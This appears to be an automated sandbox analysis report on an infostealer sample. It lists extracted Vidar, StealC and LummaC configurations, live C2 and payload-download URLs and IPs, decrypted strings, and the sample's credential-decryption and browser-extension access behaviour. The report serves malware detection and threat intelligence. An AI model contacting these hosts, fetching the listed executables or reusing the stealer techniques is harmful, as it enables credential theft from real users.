Source: Yara match	File source: 0.2.file.exe.3ce5570.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2113832701.0000000003CE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2592313057.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 3664, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3532, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3784, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 1916, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 424, type: MEMORYSTR

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C700C40 sqlite3_bind_zeroblob,		3_2_6C700C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C700D60 sqlite3_bind_parameter_name,		3_2_6C700D60

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
46.8.231.109	unknown	Russian Federation	28917	FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics	true
188.114.97.3	chaptermusu.store	European Union	13335	CLOUDFLARENETUS	true
104.102.49.254	steamcommunity.com	United States	16625	AKAMAI-ASUS	true
147.45.44.104	files.veritas.org.ng	Russian Federation	2895	FREE-NET-ASFREEnetEU	false
172.67.205.129	possiwreeste.site	United States	13335	CLOUDFLARENETUS	true
5.42.101.62	urusvisa.com	Russian Federation	39493	RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRU	true
104.21.1.169	underlinemdsj.site	United States	13335	CLOUDFLARENETUS	true
149.154.167.99	t.me	United Kingdom	62041	TELEGRAMRU	true
45.132.206.251	cowod.hopto.org	Russian Federation	59731	LIFELINK-ASRU	true

Contacted Domains

Name	IP	Active
possiwreeste.site	172.67.205.129	true
steamcommunity.com	104.102.49.254	true
urusvisa.com	5.42.101.62	true
cowod.hopto.org	45.132.206.251	true
t.me	149.154.167.99	true
files.veritas.org.ng	147.45.44.104	true
underlinemdsj.site	104.21.1.169	true
chaptermusu.store	188.114.97.3	true
commandejorsk.site	unknown	unknown
famikyjdiag.site	unknown	unknown
writekdmsnu.site	unknown	unknown
agentyanlark.site	unknown	unknown
delaylacedmn.site	unknown	unknown
bellykmrebk.site	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
commandejorsk.site	true	1%, Virustotal, Browse	unknown
http://urusvisa.com/mozglue.dll	true		unknown
http://46.8.231.109/c4754d4f680ead72.php	true	URL Reputation: malware	unknown
http://46.8.231.109/1309cdeb8f4c8736/msvcp140.dll	true	22%, Virustotal, Browse	unknown
http://urusvisa.com/softokn3.dll	true		unknown
agentyanlark.site	true	1%, Virustotal, Browse	unknown
http://files.veritas.org.ng/ldms/66fa2ae906657_snd.exe	true	3%, Virustotal, Browse	unknown
http://urusvisa.com/sql.dll	true		unknown
http://46.8.231.109/1309cdeb8f4c8736/softokn3.dll	true		unknown
http://files.veritas.org.ng/ldms/66fa2b049020f_ldnf.exe	true		unknown
underlinemdsj.site	true		unknown
http://urusvisa.com/freebl3.dll	true		unknown
possiwreeste.site	true		unknown
https://steamcommunity.com/profiles/76561199724331900	true	URL Reputation: malware	unknown
https://possiwreeste.site/api	true		unknown
http://46.8.231.109/1309cdeb8f4c8736/freebl3.dll	true		unknown
http://urusvisa.com/vcruntime140.dll	true		unknown
bellykmrebk.site	true		unknown
https://t.me/jamsemlg	true		unknown
http://46.8.231.109/1309cdeb8f4c8736/mozglue.dll	true		unknown
http://urusvisa.com/	true		unknown
https://underlinemdsj.site/api	true		unknown
https://steamcommunity.com/profiles/76561199780418869	true		unknown
http://46.8.231.109/	true		unknown
http://46.8.231.109/1309cdeb8f4c8736/nss3.dll	true		unknown

AV Detection

Antivirus detection for URL or domain

Source: http://46.8.231.109/c4754d4f680ead72.php	URL Reputation: Label: malware
Source: https://steamcommunity.com/profiles/76561199724331900	URL Reputation: Label: malware
Source: https://steamcommunity.com/profiles/76561199724331900/inventory/	URL Reputation: Label: malware

Found malware configuration

Source: 00000000.00000002.2113832701.0000000003CE5000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199780418869", "https://t.me/jamsemlg"], "Botnet": "514d77849a01ff8ab7dd99d5f0a2e19e"}
Source: 15.2.DBGIJEHIID.exe.39c5570.1.raw.unpack	Malware Configuration Extractor: StealC {"C2 url": "http://46.8.231.109/c4754d4f680ead72.php", "Botnet": "default"}
Source: 10.2.RegAsm.exe.400000.0.raw.unpack	Malware Configuration Extractor: LummaC {"C2 url": ["delaylacedmn.site", "possiwreeste.site", "writekdmsnu.site", "agentyanlark.site", "underlinemdsj.site", "commandejorsk.site", "famikyjdiag.site", "bellykmrebk.site"], "Build id": "H8NgCl--"}

Multi AV Scanner detection for domain / URL

Source: chaptermusu.store	Virustotal: Detection: 6%	Perma Link
Source: files.veritas.org.ng	Virustotal: Detection: 5%	Perma Link
Source: http://46.8.231.109/1309cdeb8f4c8736/msvcp140.dll	Virustotal: Detection: 21%	Perma Link
Source: http://46.8.231.109/c4754d4f680ead72.php=	Virustotal: Detection: 17%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\DBGIJEHIID.exe	ReversingLabs: Detection: 44%
Source: C:\ProgramData\EGDGCGCFHI.exe	ReversingLabs: Detection: 44%
Source: C:\ProgramData\KECBKKEBKE.exe	ReversingLabs: Detection: 44%
Source: C:\Users\userGIEGHJEGHJ.exe	ReversingLabs: Detection: 44%
Source: C:\Users\userIJEGDBGDBF.exe	ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\66fa2ae906657_snd[1].exe	ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\66fa2afc5abea_vasd[1].exe	ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\66fa2b049020f_ldnf[1].exe	ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\66fa2afc5abea_vasd[1].exe	ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\66fa2b049020f_ldnf[1].exe	ReversingLabs: Detection: 44%

Multi AV Scanner detection for submitted file

Source: file.exe	ReversingLabs: Detection: 50%
Source: file.exe	Virustotal: Detection: 52%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\ProgramData\KECBKKEBKE.exe	Joe Sandbox ML: detected
Source: C:\Users\userGIEGHJEGHJ.exe	Joe Sandbox ML: detected
Source: C:\ProgramData\DBGIJEHIID.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\66fa2b049020f_ldnf[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\66fa2afc5abea_vasd[1].exe	Joe Sandbox ML: detected
Source: C:\Users\userIJEGDBGDBF.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\66fa2ae906657_snd[1].exe	Joe Sandbox ML: detected
Source: C:\ProgramData\EGDGCGCFHI.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\66fa2afc5abea_vasd[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\66fa2b049020f_ldnf[1].exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 10.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: delaylacedmn.site
Source: 10.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: writekdmsnu.site
Source: 10.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: agentyanlark.site
Source: 10.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: bellykmrebk.site
Source: 10.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: underlinemdsj.site
Source: 10.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: commandejorsk.site
Source: 10.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: possiwreeste.site
Source: 10.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: famikyjdiag.site
Source: 10.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: possiwreeste.site
Source: 10.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: lid=%s&j=%s&ver=4.0
Source: 10.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: TeslaBrowser/5.5
Source: 10.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: - Screen Resoluton:
Source: 10.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: - Physical Installed Memory:
Source: 10.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: Workgroup: -
Source: 10.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: H8NgCl--

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004080A1 CryptUnprotectData,LocalAlloc,LocalFree,	3_2_004080A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00408048 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	3_2_00408048
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00411E5D CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,	3_2_00411E5D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040A7D8 _memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,_memmove,lstrcatA,PK11_FreeSlot,lstrcatA,	3_2_0040A7D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C526C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,	3_2_6C526C80

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.6:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.1.169:443 -> 192.168.2.6:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.6:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.205.129:443 -> 192.168.2.6:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.205.129:443 -> 192.168.2.6:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.1.169:443 -> 192.168.2.6:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.6:49741 version: TLS 1.2

Source: file.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: freebl3.pdb source: RegAsm.exe, 00000003.00000002.2624921125.00000000207B7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mozglue.pdbP source: RegAsm.exe, 00000003.00000002.2662400593.000000006C58D000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe, 00000003.00000002.2628819471.0000000026721000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.3067781475.000000006C7C5000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: freebl3.pdbp source: RegAsm.exe, 00000003.00000002.2624921125.00000000207B7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb@ source: RegAsm.exe, 00000003.00000002.2652017449.000000003E4EB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2665362322.000000006C74F000.00000002.00000001.01000000.00000008.sdmp
Source:	Binary string: softokn3.pdb@ source: RegAsm.exe, 00000003.00000002.2645077224.000000003260A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: RegAsm.exe, 00000003.00000002.2649143006.0000000038576000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: RegAsm.exe, 00000003.00000002.2640919241.000000002C69B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb source: RegAsm.exe, 00000003.00000002.2652017449.000000003E4EB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2665362322.000000006C74F000.00000002.00000001.01000000.00000008.sdmp
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000003.00000002.2622122875.0000000020358000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2603031796.000000001A3EA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.2881426007.000000002264B000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2787844428.00000000228AB000.00000002.00001000.00020000.00000000.sdmp
Source:	Binary string: mozglue.pdb source: RegAsm.exe, 00000003.00000002.2662400593.000000006C58D000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe, 00000003.00000002.2628819471.0000000026721000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.3067781475.000000006C7C5000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: softokn3.pdb source: RegAsm.exe, 00000003.00000002.2645077224.000000003260A000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041543D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	3_2_0041543D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00414CC8 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,strtok_s,FindNextFileA,FindClose,	3_2_00414CC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00409D1C FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_00409D1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040D5C6 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_0040D5C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040B5DF FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	3_2_0040B5DF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00401D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,	3_2_00401D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040BF4D FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	3_2_0040BF4D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00415FD1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	3_2_00415FD1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040B93F FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	3_2_0040B93F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00415B0B GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	3_2_00415B0B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040CD37 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose,	3_2_0040CD37

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00415142 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,

3_2_00415142

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr fs:[00000030h]	3_2_004014AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov dword ptr [ebp-04h], eax	3_2_004014AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp ecx	10_2_0040F242
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-28h]	10_2_0040F242
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [ecx+eax]	10_2_0040F940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	10_2_0040F940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	10_2_004109FD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 2EE0190Fh	10_2_00446C3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 68677325h	10_2_00446C3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	10_2_00446C3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp eax	10_2_0040ED69
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then lea edx, dword ptr [eax+edi]	10_2_0040FEA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	10_2_0040FEA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, ebp	10_2_00422063
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+7Ch]	10_2_00434060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ecx], al	10_2_00434060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi]	10_2_00407070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+44h]	10_2_0044716D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 77A9E0C4h	10_2_00440118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+44h]	10_2_0044711B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+7Ch]	10_2_00434136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ecx], al	10_2_00434136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+10h]	10_2_0042A1F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	10_2_0041518E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 54CA534Eh	10_2_00448190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+000004F0h]	10_2_00433240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	10_2_00433240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	10_2_00433240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	10_2_00433240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+000001B8h]	10_2_0041325D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], dx	10_2_00422260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp eax	10_2_004492C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	10_2_00425320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov dword ptr [esp], 00000000h	10_2_0041B330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ebx, eax	10_2_0040A3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ebp, eax	10_2_0040A3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ecx, word ptr [edi+eax]	10_2_00448390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edi, ebx	10_2_00430399
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp eax	10_2_00449410
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 1B788DCFh	10_2_00444480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	10_2_004354A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [esi], ax	10_2_0041F552
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+00000110h]	10_2_0041F552
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh	10_2_00445580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 77A9E0C4h	10_2_00440580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp eax	10_2_00449580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], dx	10_2_00422673
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h	10_2_0044A610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	10_2_004296C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	10_2_004446C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], dx	10_2_0042268A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp eax	10_2_00449690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h	10_2_004276A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ebx, byte ptr [ecx+esi+25h]	10_2_00408750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, edi	10_2_0042F700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then shrd esi, edx, 00000001h	10_2_00403710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	10_2_00431720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 77DD2217h	10_2_00420729
